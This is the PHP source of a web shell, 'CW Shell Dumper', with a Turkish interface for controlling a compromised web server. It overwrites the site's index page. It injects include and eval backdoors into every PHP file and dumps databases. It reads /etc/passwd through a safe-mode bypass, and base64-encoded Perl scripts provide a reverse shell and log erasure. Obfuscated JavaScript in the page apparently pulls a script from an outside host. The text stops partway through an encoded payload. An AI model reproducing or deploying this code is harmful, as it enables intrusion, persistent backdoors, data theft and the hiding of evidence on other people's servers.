CW Shell Dumper

<?
php
$entry_line="r57.biz";
$fp = fopen("index.htm", "w");
fputs($fp, $entry_line);
fclose($fp);
#GreetZ:SultanMehmed
// Variables
$info = @$_SERVER['SERVER_SOFTWARE'];
$page = @$_SERVER['SCRIPT_NAME'];
$site = getenv("HTTP_HOST");
$uname = php_uname();
$smod = ini_get('safe_mode');
if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>
"; }
else { $safemode = "<font color='red'>ACIK</font>";
}
$dir = @realpath($_POST['dir']);
$mkdir = @$_POST['makedir'];
$mydir = @$_POST['deletedir'];
$cmd = @$_GET['cmd'];
$host = @$_POST['host'];
$proto = @$_POST['protocol'];
$delete = @$_POST['delete'];
$phpeval = @$_POST['php_eval'];
$db = @$_POST['db'];
$query = @$_POST['query'];
$user = @$_POST['user'];
$pass = @$_POST['passd'];
$myports = array("21","22","23","25","59","80","113","135","445","1025","5000
","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","
8080","8018");
$quotes = get_magic_quotes_gpc();
if ($quotes == "1" or $quotes == "on")
{
$quot = "<font color='red'>ACIK</font>";
}
else
{
$quot = "<font color='lightgreen'>KAPALI</font>";
}
// Perms
function getperms($fn)
{
$mode=fileperms($fn);
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}
// milw0rm Search (locushell)
$Lversion = @php_uname('r');
$OSV = @php_uname('s');
if(eregi('Linux',$OSV))
{
$Lversion=substr($Lversion,0,6);
$millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion;
}else{
$Lversion=substr($Lversion,0,3);
$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
}
if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</scrip
t>"; }
//Space
$spacedir = @getcwd();
$free = @diskfreespace($spacedir);
if (!$free) {$free = 0;}
$all = @disk_total_space($spacedir);
if (!$all) {$all = 0;}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB"
;}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
$percentfree = intval(($free*100)/$all);
// PHPinfo
if(isset($_POST['phpinfo']))
{
die(phpinfo());
}
// Make File
$name = htmlspecialchars(@$_POST['names']);
$src = @$_POST['source'];
if(isset($name) && isset($src))
{
if($_POST['darezz'] != realpath(".")) { $name = $_POST['darezz'].$nam
e; }
$ctd = fopen($name,"w+");
fwrite($ctd, $src);
fclose($ctd);
echo "<script>alert('Uploaded')</script>";
}
// Upload File
$path = @$_FILES['ffile']['tmp_name'];
$name = @$_FILES['ffile']['name'];
if(isset($path) && isset($name))
{
if($_POST['dare'] != realpath(".")) { $name = $_POST['dare'].$name; }
if(move_uploaded_file($path, $name))
{
echo "<script>alert('Uploaded')</script>";
}
else
{
echo "<script>alert('Error')</script>";
} }
// Delete File
if(isset($delete) && $delete != $dir)
{
if(file_exists($delete))
{
unlink($delete);
echo "<script>alert('File Deleted')</script>";
}
}
// Database
if(isset($db) && isset($query) && isset($_POST['godb']))
{
$mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Conne
ction Failed')</script>");
$db = mysql_select_db($db)or die(mysql_error());
$queryz = mysql_query($query)or die(mysql_error());
if($query) { echo "<script>alert('Done')</script>"; }
else { echo "<script>alert('Error')</script>"; }
}
// Dump Database [pacucci.com]
if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
mysql_connect('localhost', $user, $pass);
mysql_select_db($db);
$tables = mysql_list_tables($db);
while ($td = mysql_fetch_array($tables))
{
$table = $td[0];
$r = mysql_query("SHOW CREATE TABLE `$table`");
if ($r)
{
$insert_sql = "";
$d = mysql_fetch_array($r);
$d[1] .= ";";
$SQL[] = str_replace("\n", "", $d[1]);
$table_query = mysql_query("SELECT * FROM `$table`");
$num_fields = mysql_num_fields($table_query);
while ($fetch_row = mysql_fetch_array($table_query))
{
$insert_sql .= "INSERT INTO $table VALUES(";
for ($n=1;$n<=$num_fields;$n++)
{
$m = $n - 1;
$insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
}
$insert_sql = substr($insert_sql,0,-2);
$insert_sql .= ");\n";
}
if ($insert_sql!= "")
{
$SQL[] = $insert_sql;
}
}
}
$dump = "-- Database: ".$_POST['db'] ." \n";
$dump .= "-- CWShellDumper v3\n";
$dump .= "-- r57.biz\n";
$dumpp = $dump.implode("\r", $SQL);
$name = $db."-".date("d-m-y")."cyberwarrior.sql";
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename = $name");
echo $dumpp;
die();
}
// Make Dir
if(isset($mkdir)) {
mkdir($mkdir);
if($mkdir) { echo "<script>alert('Tamamdr.')</script>"; } }
// Delete Directory
if(isset($mydir) && $mydir != "$dir") {
$d = dir($mydir);
while($entry = $d->read()) {
if ($entry !== "." && $entry !== "..") {
unlink($entry);
}
}
$d->close();
rmdir($mydir);
}
//Infect Files [RFI]
if(isset($_POST['inf3ct']))
{
foreach (glob("*.php") as $lola)
{
$dira = '.';
$asdi = fopen($lola, 'a+');
@fwrite($asdi, '
<?php
include($_GET[\'pwn\']);
?>');
@fclose($asdi);
}
if($asdi)
{
$textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>';
}
else {
$textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>';
}
}
//Infect Files [Eval]

if(isset($_POST['evalinfect']))
{
foreach (glob("*.php") as $lal)
{
$dira = '.';
$axd = fopen($lal, 'a+');
@fwrite($axd, '
<?php
eval(stripslashes($_GET[\'eval\']));
?>');
@fclose($axd);
}
if($axd)
{
$textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>';
}
else {
$textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>';
}
}
// Images
if(@$_GET['com'] == "image")
{
$images = array(
"folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q
7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYh
p9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j
0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd
6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2M
sylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1
w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD
0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4
bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
"file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QA
AABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIj
yTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORW
kBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z
67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPm
cSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8
CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgo
b/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOw
M4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDw
YGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj
++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOx
crAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uI
TAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWl
eBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKb
Oy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzc
zA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4
zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0
L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+z
alvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
"floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQ
xR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjE
wogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwga
FOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
);
header("Content-type: image/gif");
header("Cache-control: public");
header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
header("Cache-control: max-age=".(60*60*24*7));
header("Last-Modified: ".date("r",filemtime(__FILE__)));
$image = $images[$_GET['img']];
echo base64_decode($image);
}
//File List
chdir($dir);
if(!isset($dir)) { $dir = @realpath("."); }
if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
$pahtw = 0;
$filew = 0;
$num = 1;
if (is_dir($dir))
{
if ($open = opendir($dir))
{
if(is_dir($dir)) {
$typezz = "DIR";
$pahtw++;
}
while (($list = readdir($open)) == true)
{
if(is_dir($list)) {
$typezz = "DIR";
$pahtw++;
@$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 fac
e=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font>
</td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($
list) .'</font></td></tr>'; }
else {
$lolz = filesize($list) / 1024;
$lolx = intval($lolz);
if($lolx == 0) { $lolx = 1; }
$typezz = "DOSYA";
$filew++;
$listz = "/".$list;
if(eregi($page,$listz)) {
@$listf.= '<tr><td valign=top><img src=?com=imag
e&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font
size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=V
erdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms
($list) . '</font></tr>'; }
elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td v
align=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b
><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=1
5%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 fac
e=Verdana>' . getperms($list) . '</font></tr>'; }
else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2
face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td>
<td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valig
n=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; } }
}
closedir($open);
}
$fileq = $pahtw + $filew;
echo "<html>
<head>
<style>
table.menu {
border-width: 0px;
border-spacing: 1px;
border-style: solid;
border-color: #a6a6a6;
border-collapse: separate;
background-color: rgb(98, 97,97);
}
table.menuz {
border-width: 0px;
border-spacing: 1px;
border-style: solid;
border-color: #a6a6a6;
border-collapse: separate;
background-color: rgb(98, 97,97);
}
table.menu td {
border-width: 1px;
padding: 1px;
border-style: none;
border-color: #333333;
background-color: #000000;
-moz-border-radius: 0px;
}
table.menuz tr {
border-width: 1px;
padding: 1px;
border-style: none;
border-color: #333333;
-moz-border-radius: 0px;
}
table.menuz tr:hover {
}
input,textarea,select {
font: normal 11px Verdana, Arial, Helvetica, sans-serif;
background-color:black;
color:#a6a6a6;
border: solid 1px #363636;
}
</style>
</head>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C
%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%6
9%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%
2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72
%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%6
9%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%
73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73
%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%7
4%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));
dF('%264DTDSJQU%2631MBOHVBHF%264E%2633kbwbtdsjqu%2633%2631TSD%264E%2633iuuq%264B
00s68d%3A%3A/dpn0o4xti4m0dj%7B/kt%2633%264F%261B%261B%264D0TDSJQU%264F%261B%261%
3A%261%3A%261%3A1')</script>
<body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#eb
ebeb'>
<table style='background-color:#333333; border-color:#a6a6a6' width=100% border=
0 align=center cellpadding=0 cellspacing=0>
<tr><td>
<center><b><font size='6' face='Webdings'></font>
<font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell
~</font></a>
<font size='6' face='Webdings'></font></b>
</center>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C
%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%6
9%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%
2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72
%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%6
9%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%
73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73
%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%7
4%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));
dF('%264DTDSJQU%2631MBOHVBHF%264E%2633kbwbtdsjqu%2633%2631TSD%264E%2633iuuq%264B
00s68d%3A%3A/dpn0o4xti4m0dj%7B/kt%2633%264F%261B%261B%264D0TDSJQU%264F%261B%261%
3A%261%3A%261%3A1')</script>
</td></tr></table><table class=menu width=100%<tr><td>
<font size='1' face='Verdana'><b>Site: </b><u>$site</u> <br>
<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
<b>Server Bilgisi : </b> <u>$info</u> <br>
<b>Uname -a:</b> <u>$uname</u> <br>
<b>Klasr:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
<b>Safe Mode:</b> <u>$safemode</u> <br>
<b>Sihirli Sozler:</b> <u>$quot</u> <br>
<b>Sayfa:</b> <u>$page</u><br>
<b>Bo Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
<b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>
<b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http:
//whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']
."</a></td></tr>
<tr><td><form method='post' action=''>
<center><input type=submit value='File List' name=filelist> - <input type=submit
value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='e
ncoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input typ
e='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='log
eraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Co
nnect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
// Safe Mode Bypass
if(isset($_POST['safemodz']))
{
echo "<tr><td valign=top width=50%>
<center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></
b>
<form action='' method='post'>
<font size='1' face='Verdana'>Dosya ad:</font><br> <input type='text' name=
'filew' value='/etc/passwd'> <input type='submit' value='Dosyay Oku' name='redfi'

><br>
</td><tr>
<td valign=top>
<center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasrler]<br></font></
b>
<form method='post' action=''>
<font size='1' face='Verdana'>Klasr:</font><br>
<input type='text' name='directory'> <input type='submit' value='Listele' nam
e='reddi'>";
}
// Safe Mode Bypass: File
if(isset($_POST['redfi']))
{
$test='';
$tempp= tempnam($test, "cx");
$get = htmlspecialchars($_POST['filew']);
if(copy("compress.zlib://".$get, $tempp)){
$fopenzo = fopen($tempp, "r");
$freadz = fread($fopenzo, filesize($tempp));
fclose($fopenzo);
$source = htmlspecialchars($freadz);
echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea
rows='20' cols='80' name='source'>$source</textarea>";
unlink($tempp);
} else {
echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>"
;
}
}
// Safe Mode Bypass: Directory
if(isset($_POST['reddi'])){
function dirz()
{
$dirz = $_POST['directory'];
$files = glob("$dirz*");
foreach ($files as $filename) {
echo "<tr><td><font size='1' face='Verdana'>";
echo "$filename\n";
echo "</font><br>";
}
}
echo "<br>"; dirz();
}
// Connect Back
if(isset($_POST['connectback']))
{
echo "
<tr><td>
<center><font size='2' face='Verdana'><b>Back-Connect</b><br></font>
<form method='post' action=''><input type='text' name='connhost' size='15'value=
'target'> <input type='text' name='connport' size='5' value='port'> <input type=
'submit' name='connsub' value='Run'></form>";
}
if(isset($_POST['logeraser']))
{
echo "<tr><td>
<center><b><font size='2' face='Verdana'>:: OS ::<br></font></b>
<select name=functionp>
<option>linux</option>
<option>sunos</option>
<option>aix</option>
<option>irix</option>
<option>openbsd</option>
<option>solaris</option>
<option>suse</option>
<option>lampp</option>
<option>debian</option>
<option>freebsd</option>
<option>misc</option>
</select><br><input type='submit' name='runer' value='Erase'></table>";
}
// Connect Back
if(isset($_POST['connsub']))
{
$sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2
VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOw
oKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldC
kgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfH
wgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU0
9DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7Cm
Nvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj
4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVC
IpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA==");
$openz = fopen("cbs.pl", "w+")or die("Error");
fwrite($openz, $sources)or die("Error");
fclose($openz);
$aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
unlink("cbs.pl");
}
if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verd
ana' size='2'>Done.</font>"; }
// Logs Eraser
if(isset($_POST['runer']))
{
echo "<tr><td><center><textarea cols='30' rows='2'>";
$erase = base64_decode("IyF1c3IvYmluL3BlcmwNCiMgQ1dTSGVsbA0KICAgICAgIGNob21wKCRv
cyA9ICRBUkdWWzBdKTsNCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcIm1pc2NcIil7ICNJZiBt
aXNjIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAg
IHByaW50IFwiWytdbWlzYyBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7
DQogICAgICAgICAgICAgcHJpbnQgXCI8dHI+WytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAg
ICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYSA9IHVubGluayBAbWlzYzsgICANCiAgICAgICAg
ICAgICBzbGVlcCAxOw0KCQkJIA0KICAgICAgICAgICAgaWYoJGEpIHsgcHJpbnQgXCJbK11Mb2dzIFN1
Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7
IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwib3BlbmJzZFwi
KXsgI0lmIG9wZW5ic2QgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQog
ICAgICAgICAgICAgcHJpbnQgXCJbK11vcGVuYnNkIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAg
ICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOyAg
IA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGIgPSB1bmxpbmsgQG9wZW5ic2Q7
ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgIGlmKCRiKSB7cHJpbnQgXCJbK11M
b2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7ICAgfQ0KCQkJZWxzZSB7IHByaW50IFwiWy1d
RXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJm
cmVlYnNkXCIpeyAjSWYgZnJlZWJzZCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJh
Y2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXWZyZWVic2QgU2VsZWN0ZWQuLi5cXG5cIjsgICAN
CiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVk
Li4uXFxuXCI7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYyA9IHVubGlu
ayBAZnJlZWJzZDsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRjKSB7
IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgZWxzZSB7
IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBp
Zigkb3MgZXEgXCJkZWJpYW5cIil7ICNJZiBEZWJpYW4gdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5k
IHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11kZWJpYW4gU2VsZWN0ZWQuLi5c
XG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBM
b2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZCA9IHVu
bGluayBAZGViaWFuOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGQp
IHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxz
ZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAg
ICBpZigkb3MgZXEgXCJzdXNlXCIpeyAjSWYgc3VzZSB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQg
c3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXXN1c2UgU2VsZWN0ZWQuLi5cXG5c
IjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2Nh
dGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZSA9IHVubGlu
ayBAc3VzZTsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgaWYoJGUpIHsgcHJp
bnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSBlbHNlIHsgcHJp
bnQgXCJbLV1FcnJvclwiOyB9DQogICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmKCRv
cyBlcSBcInNvbGFyaXNcIil7ICNJZiBzb2xhcmlzIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBz
dGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdc29sYXJpcyBTZWxlY3RlZC4uLlxc
blwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExv
Y2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRmID0gdW5s
aW5rIEBzb2xhcmlzOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGYpIHtw
cmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJIGVsc2UgeyBw
cmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYo
JG9zIGVxIFwibGFtcHBcIil7ICNJZiBsYW1wcCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3Rh
cnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxhbXBwIFNlbGVjdGVkLi4uXFxuXCI7
DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRl
ZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGcgPSB1bmxpbmsg
